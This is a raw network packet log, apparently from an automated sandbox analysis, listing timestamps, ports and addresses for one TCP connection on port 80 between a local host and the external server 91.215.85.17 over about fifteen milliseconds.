Oct 13, 2023 15:20:56.881895065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881938934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.881973982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882024050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882091999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882134914 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.882189035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882232904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.882249117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882312059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882411003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882452965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882463932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.882498980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.882530928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882590055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882656097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882708073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.882745028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882786989 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.882877111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.882949114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883007050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883049965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.883066893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883111954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.883164883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883227110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883287907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883311033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.883335114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883400917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.883431911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883464098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883512974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.883550882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883673906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883733034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883780003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.883858919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883876085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.883928061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.883955956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884018898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884064913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884066105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.884083033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884114981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.884151936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884224892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884270906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.884295940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884347916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884347916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.884404898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884480000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884525061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.884565115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884612083 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.884648085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884717941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884735107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884783030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.884809971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884855032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.884865999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884918928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.884998083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885015011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885051012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.885082006 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.885092020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885129929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885185003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.885222912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885272026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885358095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885375023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885406971 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.885440111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.885461092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885494947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885549068 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.885555029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885668039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885710955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885760069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.885787964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885834932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.885843039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885902882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.885997057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886046886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.886049032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886066914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886094093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.886145115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886203051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886251926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.886286020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886327982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886327982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.886415005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886487007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886537075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.886573076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886627913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.886651993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886745930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886821032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886871099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.886884928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.886934042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.886970997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887033939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887111902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887161016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.887195110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887243986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.887253046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887332916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887372971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887418985 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.887427092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887469053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.887480974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887512922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887582064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887629032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.887646914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887679100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887696028 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.887782097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887914896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.887962103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.887981892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888014078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888030052 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888101101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888118029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888171911 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888209105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888241053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888257027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888295889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888365984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888413906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888433933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888467073 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888488054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888524055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888586044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888633013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888657093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888704062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888710976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888775110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888820887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888869047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888873100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.888921022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.888957024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889039993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889085054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889132977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.889169931 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889202118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889221907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.889259100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889337063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889353991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889386892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.889417887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.889427900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889472008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889507055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889561892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.889569044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889622927 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.889658928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889728069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889828920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889875889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889878035 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.889913082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.889931917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.889971018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890027046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890077114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.890094042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890125990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890141010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.890208960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890252113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890295029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890299082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.890331984 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.890336990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890409946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890456915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890507936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.890513897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890562057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.890634060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890714884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890780926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890808105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890835047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.890872955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890904903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.890904903 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.890959978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891009092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.891021013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891068935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.891104937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891190052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891258955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891304970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.891310930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891359091 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.891362906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891432047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891495943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891542912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.891566038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891616106 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.891653061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891741991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891788006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891835928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891838074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.891875029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.891882896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.891966105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892018080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892071009 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.892087936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892107010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892134905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.892225027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892242908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892260075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892291069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.892313004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.892318010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892391920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892442942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892442942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.892481089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892565966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892616987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.892651081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892697096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.892769098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892813921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892888069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.892936945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.892992020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893039942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.893055916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893142939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893218040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893258095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893270969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.893302917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.893310070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893342972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893404961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893451929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.893461943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893506050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.893523932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893611908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893670082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893704891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893748999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.893748999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.893764973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893815041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893896103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893966913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.893980980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894013882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894020081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894093990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894165039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894208908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894217968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894256115 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894272089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894289970 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894355059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894407034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894449949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894483089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894498110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894584894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894603014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894654036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894690037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894707918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894737959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894763947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894819021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894819021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894830942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894877911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894927979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.894928932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.894996881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895060062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895112038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.895142078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895190954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.895214081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895231962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895318031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895370007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.895401955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895447016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.895464897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895561934 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895644903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895687103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.895798922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895842075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.895853043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.895946026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896094084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896146059 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.896183014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896234035 CEST	49721	80	192.168.2.5	91.215.85.17
